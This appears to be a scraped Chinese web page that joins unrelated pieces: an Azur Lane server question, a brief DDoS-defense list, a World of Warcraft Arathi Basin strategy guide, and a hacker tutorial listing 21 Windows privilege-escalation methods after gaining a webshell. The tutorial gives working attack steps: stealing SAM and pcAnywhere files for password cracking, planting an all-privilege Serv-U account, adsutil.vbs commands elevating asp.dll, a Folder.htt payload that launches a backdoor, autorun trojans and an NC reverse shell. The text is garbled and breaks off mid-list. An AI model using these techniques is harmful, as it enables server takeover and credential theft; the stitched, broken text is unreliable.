碧蓝航线十字军行动服务器是哪个服？

十字军行动服务器是渠道服，渠道服的优点是在应用商店下载方便，而且代理商会时常举行充值返利活动，提供比官服更加优惠的充值折扣来吸引用户留存，但缺点是渠道服玩家不能在游戏中分享截图，更严重的是玩家们的账号数据被代理商所掌握，账号安全性较低。

《碧蓝航线》游戏背景在近71%的表面被海水覆盖着的蓝色星球，人类的文明伴随着海域成熟发展。而一切的平静被突然出现在海洋中的未知敌人——拥有压倒性战力的神秘敌人“塞壬”打破。为了夺回曾经的辉煌，白鹰、皇家、铁血、重樱等几大阵营联合起来成立了第三方军事组织“碧蓝航线”，奔赴战场的前线……

在这个病毒黑客肆意侵略的互联网时代,安全问题一直是人们心头的一个大隐患。服务器的安全性的涉及面很广,但是安全登录无疑是最基础,最关键的环节,往往越是基础的工作,就越容易被人们忽视,而病毒和黑客们就是从这些被人们忽视的细节下手,打得人们措手不及。壹基比小喻就如何保证服务器登录安全的问题提供几条非常实用的防护手段,供大家参考。

1、定期扫描

要定期扫描现有的网络主节点，清查可能存在的安全漏洞，对新出现的漏洞及时进行清理。骨干节点的计算机因为具有较高的带宽，是黑客利用的最佳位置，因此对这些主机本身加强主机安全是非常重要的。而且连接到网络主节点的都是服务器级别的计算机，所以定期扫描漏洞就变得更加重要了。

2、在骨干节点配置防火墙

防火墙本身能抵御DdoS攻击和其他一些攻击。在发现受到攻击的时候，可以将攻击导向一些牺牲主机，这样可以保护真正的主机不被攻击。当然导向的这些牺牲主机可以选择不重要的，或者是linux以及unix等漏洞少和天生防范攻击优秀的系统。

3、用足够的机器承受攻击

这是一种较为理想的应对策略。如果用户拥有足够的容量和足够的资源给攻击，在它不断访问用户、夺取用户资源之时，自己的能量也在逐渐耗失，或许未等用户被攻死，黑客已无力支招儿了。不过此方法需要投入的资金比较多，平时大多数设备处于空闲状态，和目前中小企业网络实际运行情况不相符。

4、充分利用网络设备保护网络资源

所谓网络设备是指路由器、防火墙等负载均衡设备，它们可将网络有效地保护起来。当网络被攻击时最先死掉的是路由器，但其他机器没有死。死掉的路由器经重启后会恢复正常，而且启动起来还很快，没有什么损失。若其他服务器死掉，其中的数据会丢失，而且重启服务器又是一个漫长的过程。特别是一个公司使用了负载均衡设备，这样当一台路由器被攻击死机时，另一台将马上工作。从而最大程度的削减了DdoS的攻击。

5、过滤不必要的服务和端口

过滤不必要的服务和端口，即在路由器上过滤假IP……只开放服务端口成为目前很多服务器的流行做法，例如WWW服务器那么只开放80而将其他所有端口关闭或在防火墙上做阻止策略。

6、检查访问者的来源

使用Unicast Reverse Path Forwarding等通过反向路由器查询的方法检查访问者的IP地址是否是真，如果是假的，它将予以屏蔽。许多攻击常采用假IP地址方式迷惑用户，很难查出它来自何处。因此，利用Unicast Reverse Path Forwarding可减少假IP地址的出现，有助于提高网络安全性。

7、过滤所有RFC1918 IP地址

RFC1918 IP地址是内部网的IP地址，像10000、19216800 和1721600，它们不是某个网段的固定的IP地址，而是Internet内部保留的区域性IP地址，应该把它们过滤掉。此方法并不是过滤内部员工的访问，而是将攻击时伪造的大量虚假内部IP过滤，这样也可以减轻DdoS的攻击。

8、限制SYN/ICMP流量

用户应在路由器上配置SYN/ICMP的最大流量来限制SYN/ICMP封包所能占有的最高频宽，这样，当出现大量的超过所限定的SYN/ICMP流量时，说明不是正常的网络访问，而是有黑客入侵。早期通过限制SYN/ICMP流量是最好的防范DOS的方法，虽然目前该方法对于DdoS效果不太明显了，不过仍然能够起到一定的作用。

阿拉希盆地是资源争夺的胜负，不是攻防次数的胜负。守住更多，拥有更多，1600资源就是胜利，不要让其他杂念带走你的胜利。拥有战场队的工会并不多，大多工会都集中力量在MC或BWL，以至于战场常常组野队，乱打一气自然是输多赢少。阿拉希战场总共5个资源据点，只有当资源据点处于一方拥有状态的时候才可以获取资源，争夺中无法获取，只要在一半以上的时间，争夺到并守住3个资源点，就可确保最低限度的胜利。也就是说，守住比敌方更多的资源据点，并牢固防守、保证不丢，即可确保胜利。在两团实力相差并不悬殊的情况下，这是必须遵循的一条取胜准则。

在这里不妨思考一个问题：夺下一块地方是很不容易的，让其没有出产多少资源就丢了，是不是很可惜？阿拉希的胜利条件是什么？最先获得1600资源，用你最大的能耐来守据点吧！迅速积累产出的资源就离胜利越近！当然，你的对手是不可能的让你轻松达成目标的。他们会来进攻你的据点，他们也会阻碍你获得据点的控制权。 即阿拉希战场的胜利必备条件和获胜的最低限度：在全局一半以上的时间内，控制3个以上资源据点。确保最先获得1600资源，这是胜利的最低限度保证。

阿拉希战场的5资源据点分布：

矿洞

兽栏　铁匠　农场

伐木

其中，矿洞是盆地、伐木是高地、铁匠是岛屿。而兽栏和农场则分别是联盟和部落的两个出发点。

从行军路线上来看两个邻接的据点的路线情况：

兽栏————矿洞（可很快到达）

兽栏————伐木（可很快到达）

农场————伐木（可很快到达）

农场————矿洞（可很快到达）

然后是作为中间点的铁匠：

铁匠————农场（可很快到达）

铁匠————兽栏（较慢到达，路线远于农场。涉水行动又大大降低速度）

铁匠————伐木（可很快到达）

铁匠————矿洞（最慢到达，盆地内必须绕上，而从上方跳下又会损失大量体力）

不难看出，最容易形成3个据点间相互支援的最短距离的防守的三个点是：

铁匠、农场、伐木（这是相互间距离最短的黄金铁三角！可将机动兵力集中在铁匠的桥附近，哪边遭遇进攻就支援哪边，基本上可以很稳固的坚持到胜利）

此外，木－兽－矿、木－农－矿、农－木－兽等等三据点防守都是比较可靠的，三者行军路线差不多。但是铁－矿－木、或农－铁－兽，就是最糟糕的三据点，相互间不是隔了水，就是高地、盆地间无法迅速相互支援，极易丢失据点。 基本地形：

开局的目的，是尽快拥有自己的“三据点”

中盘的目的，是牢固的防守自己的“三据点”

简略地图：

矿洞

兽栏　铁匠　农场

伐木

以联盟方的为例，从兽栏出发后，最容易直接获得的就是矿洞和伐木。留下必要的防守人员后，机动部队回兽栏待命，哪边遇到进攻就立刻支援，即可比较直接的形成“三据点相互支援”。部落方则是最容易形成农——铁——木的最佳铁三角。

要拿下一个据点，必须一名士兵在连续15秒不被任何敌方攻击、或洗脑（恐惧、魅惑、致盲等）打扰下，开启旗子后才能完成。即便周围只有一个敌兵，他也能在30码距离内轻松做到打断对方开旗！（法系的丢魔杖、贼猎战士开枪、圣骑顶无敌后上去敲一锤子总会吧）如果有己方队员留守，在视觉可察的范围内遇到敌方进攻部队的那一刻，就在综合频道内大声求援，只要援兵在20秒内到达，如果此时敌方还没有完成开旗，那么他们的这次进攻多半就告徒劳！而20秒的支援时间，对于拥有千金马、并掌握最近的距离“三据点”的队伍来说，是很容易做到的（除非严重开小差！如果遇上这种人，不要留情！或LF刷公告、或向对方公会会长投诉、或在官方论坛通缉，用所有可能做到的方法来鄙视他吧！这种货色不配进战场！）。

开局必须形成的“三据点防守”。战场的指挥官们务必尽快打下相互间距离最近的三个资源据点。可能的话，就一定要夺下 “黄金铁三角”的农——铁——木，全地图中，唯独只有这三个据点相互间的距离是最短的。农-铁-木，三者相互间的距离都很短。而矿-兽-木，的矿与木之间就无法立刻支援，必须利用兽来作中转点，此外，铁-矿-农，或者其他组合都有类似的毛病。 夺下资源点之后的事情，就是尽全力防守住，让其出产资源，好尽快达到1600。中盘的防守尤为重要。最起码每个据点需要2个人作为岗哨！这是最低限度。将团队的15个人中，分出6个人，分别作为三个据点的岗哨。将其余的人作为机动部队，在中转点（即到达另外两个据点都很近、能在20秒内到达的据点）待命。听到求援即刻出发支援。

担任岗哨的人在目测到敌方进攻部队的那霎那，即开始求援！要选有责任心的人担任据点岗哨。或者将其责任心逼出来！如果一个据点在没有接到任何求援的情况下响起了服务器自动的被夺警报，就好好责备那两个不负责任的岗哨吧！如果因此开吵，不用客气，直接T出团队！这是没办法的事情，因为这关系到全团的胜负。 阿拉希盆地

“三据点”是最先获得1600资源胜利的最低保障，而无人防守的据点是稍瞬即丢的。2个人员是据点岗哨的最低需求。（法师的变羊倒不可怕，可怕的是贼，潜行闷棍后立刻开旗，这样的话即便立刻求援也来不及，所以必须2个人作为岗哨；拥有优秀猎人的情况除外。） 每一个职业都清楚自己该干什么；每一个小队的人都严格执行命令和清楚自己的责任（防守人员的呼救，进攻的同步等）；每一个团队成员都能娴熟的处理各种应急情况。在战场，装备是较为次要的条件，多一天的有序训练，可完全弥补套紫与套蓝装备间的差距。战场的胜负，就是团队间的胜负。而组成团队的则是人、担任这各个职业的人。

在得到了一个Webshell之后，如果能进一步利用系统的配置不当取得更高的权限，一直是广大黑友们所津 津乐道的话题，也是[被屏蔽的不受欢迎关键词]高shou和菜鸟间最大的区别。本文将从一个大角度总括当前流行的各种提权方法，希望 对大家有所启发，起到一个抛砖引玉的作用 WEBSHELL权限提升技巧 c: d: e: C:\Documents and Settings\All Users\「开始」菜单\程序\ 看这里能不能跳转，我们从这里可以获取好多有用的信息比如Serv-U的路径， C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\ 看能否跳转到这个目录，如果行那就最好了，直接下它的CIF文件，破解得到pcAnywhere密码，登陆 c:\Program Files\serv-u\ C:\WINNT\system32\config\ 下它的SAM，破解密码 c:\winnt\system32\inetsrv\data\ 是erveryone 完全控制，很多时候没作限制，把提升权限的工具上传上去，然后执行 c:\prel C:\Program Files\Java Web Start\ c:\Documents and Settings\ C:\Documents and Settings\All Users\ c:\winnt\system32\inetsrv\data\ c:\Program Files\ c:\Program Files\serv-u\ C:\Program Files\Microsoft SQL Server\ c:\Temp\ c:\mysql\(如果服务器支持PHP） c:\PHP(如果服务器支持PHP） 运行"cscript C:\Inetpub\AdminScripts\adsutilvbs get w3svc/inprocessisapiapps"来提升权限 还可以用这段代码试提升，好象不是很理想的 如果主机设置很变态，可以试下在c:\Documents and Settings\All Users\「开始」菜单\程序\启动"写 入bat，vbs等木马。 根目录下隐藏autoruninf C:\PROGRAM FILES\KV2004\ 绑 D:\PROGRAM FILES\RISING\RAV\ C:\Program Files\Real\RealServer\ rar Folderhtt与desktopini 将改写的Folderhtt与desktopini，还有你的木马或者是VBS或者是什么，放到对方管理员最可能浏览的 目录下 replace 替换法 捆绑 脚本 编写一个启动/关机脚本 重起 删SAM 错 CAcls命令 FlashFXP文件夹Sitesdat Sitesdatbak Statsdat Statsdatbak Ring的权限提升21大法！ 以下全部是本人提权时候的总结 很多方法至今没有机会试验也没有成功，但是我是的确看见别人成功过 的。本人不才，除了第一种方法自己研究的，其他的都是别人的经验总结。希望对朋友有帮助！ 1radmin连接法 条件是你权限够大，对方连防火墙也没有。封装个radmin上去，运行，开对方端口，然后radmin上去 。本人从来米成功过。，端口到是给对方打开了。 2paanywhere C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\ 这里下他的GIF 文件，在本地安装pcanywhere上去 3SAM破解 C:\WINNT\system32\config\ 下他的SAM 破解之 4SU密码夺取 C:\Documents and Settings\All Users\「开始」菜单\程序\ 引用：Serv-U，然后本地查看属性，知道路径后，看能否跳转 进去后，如果有权限修改ServUDaemonini，加个用户上去，密码为空 [USER=WekweN|guxin] Password= HomeDir=c:\ TimeOut=600 Maintenance=System Access1=C:\|RWAMELCDP Access1=d:\|RWAMELCDP Access1=f:\|RWAMELCDP SKEYvalues= 这个用户具有最高权限，然后我们就可以ftp上去 quote site exec xxx 来提升权限 5c:\winnt\system32\inetsrv\data\ 引用：就是这个目录，同样是erveryone 完全控制，我们所要做的就是把提升权限的工具上传上去， 然后执行 6SU溢出提权 这个网上教程N多 不详细讲解了 7运行Csript 引用：运行"cscript C:\Inetpub\AdminScripts\adsutilvbs get w3svc/inprocessisapiapps"来提 升权限 用这个cscript C:\Inetpub\AdminScripts\adsutilvbs get w3svc/inprocessisapiapps 查看有特权的dll文件：idqdll httpextdll httpodbcdll ssincdll msw3prtdll 再将aspdll加入特权一族 aspdll是放在c:\winnt\system32\inetsrv\aspdll (不同的机子放的位置不一定一样) 我们现在加进去cscript adsutilvbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idqdll" "C:\WINNT\system32\inetsrv\httpextdll" "C:\WINNT\system32\inetsrv\httpodbcdll" "C:\WINNT\system32\inetsrv\ssincdll" "C:\WINNT\system32\msw3prtdll""c:\winnt\system32 \inetsrv\aspdll" 可以用cscript adsutilvbs get /W3SVC/InProcessIsapiApps 来查看是不是加进去了 8脚本提权 c:\Documents and Settings\All Users\「开始」菜单\程序\启动"写入bat，vbs 9VNC 这个是小花的文章 HOHO 默认情况下VNC密码存放在HKCU\Software\ORL\WinVNC3\Password 我们可以用vncx4 破解它，vncx4使用很简单，只要在命令行下输入 c:\>vncx4 -W 然后顺序输入上面的每一个十六进制数据，没输完一个回车一次就行了。 10NC提权 给对方来个NC 但是条件是你要有足够的运行权限 然后把它反弹到自己的电脑上 HOHO OK了 11社会工程学之GUEST提权 很简单 查看他的拥护 一般来说 看到帐户以后 密码尽量猜 可能用户密码一样 也可能是他QQ号 邮 箱号 手机号 尽量看看 HOHO 12IPC空连接 如果对方真比较白痴的话 扫他的IPC 如果运气好还是弱口令 13替换服务 这个不用说了吧？个人感觉相当复杂 14autorun inf autorun=xxxexe 这个=后面自己写 HOHO 加上只读、系统、隐藏属性 传到哪个盘都可以的 不相信 他不运行 15desktopini与Folderhtt 引用：首先，我们现在本地建立一个文件夹，名字不重要，进入它，在空白处点右键，选择"自定义 文件夹"（xp好像是不行的）一直下点，默认即可。完成后，你就会看到在此目录下多了两个名为Folder setting的文件架与desktopini的文件，（如果你看不到，先取消"隐藏受保护的操作系统文件"）然后 我们在Folder setting目录下找到Folderhtt文件，记事本打开，在任意地方加入以下代码： <OBJECT ID="RUNIT" WIDTH=0 HEIGHT=0 TYPE="application/x-oleobject" CODEBASE="你的后门文件名"> </OBJECT> 然后你将你的后门文件放在Folder setting目录下，把此目录与desktopini一起上传到对方 任意一个目录下，就可以了，只要等管理员浏览了此目录，它就执行了我们的后门 16su覆盖提权 本地安装个su，将你自己的ServUDaemonini文件用从他那下载下来的ServUDaemonini 覆盖掉，重 起一下Serv-U，于是你上面的所有配置都与他的一模一样了 17SU转发端口 43958这个是 Serv －U 的本地管理端口。FPIPEexe上传他，执行命令： Fpipe –v –l 3333 –r 43958 127001 意思是将4444端口映射到43958端口上。 然后就可以在本地安装一个Serv-u，新建一个 服务器，IP填对方IP，帐号为LocalAdministrator 密码为<img align="absmiddle" src="skins/default/email1gif" alt=""/><a href="mailto:#1@$ak#1k;0@p" target="_blank">#1@$ak#1k;0@p</a> 连接上后你就可以管理他的 Serv-u了 18SQL帐户密码泄露 如果对方开了MSSQL服务器，我们就可以通过用SQL连接器加管理员帐号（可以从他的连接数据库的 ASP文件中看到），因为MSSQL是默认的SYSTEM权限。 引用：对方没有删除xp_cmdshell 方法：使用Sqlexecexe，在host 一栏中填入对方IP，User与Pass 中填入你所得到的用户名与密码。format选择xp_cmdshell"%s"即可。然后点击connect，连接上后就可 以在CMD一栏中输入你想要的CMD命令了 19aspdll 引用：因为aspdll是放在c:\winnt\system32\inetsrv\aspdll (不同的机子放的位置不一定相同 ) 我们现在加进去cscript adsutilvbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idqdll" "C:\WINNT\system32\inetsrv\httpextdll" "C:\WINNT\system32\inetsrv\httpodbcdll" "C:\WINNT\system32\inetsrv\ssincdll" "C:\WINNT\system32\msw3prtdll""c:\winnt\system32 \inetsrv\aspdll" 好了,现在你可以用cscript adsutilvbs get /W3SVC/InProcessIsapiApps 来查看是不是加进去 了,注意,用法中的get和set,一个是查看一个是设置还有就是你运行上面的你要到 C:\Inetpub\AdminScripts>这个目录下 那么如果你是一个管理员,你的机子被人用这招把asp提升为system权限,那么,这时,防的方法就是把 aspdll T出特权一族,也就是用set这个命令,覆盖掉刚才的那些东东 20Magic Winmail 前提是你要有个webshell 引用：<a href="http://wwweviloctalcom/forum/readphptid=3587">http://wwweviloctalcom/forum/readphptid=3587</a>这里去看吧 21DBO…… 其

参考资料：